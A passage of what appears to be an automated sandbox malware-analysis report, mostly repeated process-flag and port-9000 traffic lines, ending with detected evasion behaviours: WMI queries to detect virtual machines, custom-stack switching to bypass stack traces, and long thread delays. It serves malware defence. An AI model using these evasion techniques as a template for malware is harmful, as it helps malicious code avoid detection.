                            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49800
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49801
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Switches to a custom stack to bypass stack traces
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeAPI/Special instruction interceptor: Address: 6CCB7C44
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeAPI/Special instruction interceptor: Address: 6CCB7945
                            Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6CCB3B54
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2720000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4720000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeThread delayed: delay time: 412000Jump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeThread delayed: delay time: 412000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4388Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5413Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1908Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7639Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayispJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vpdcuvmJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeAPI coverage: 2.5 %
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeAPI coverage: 3.9 %
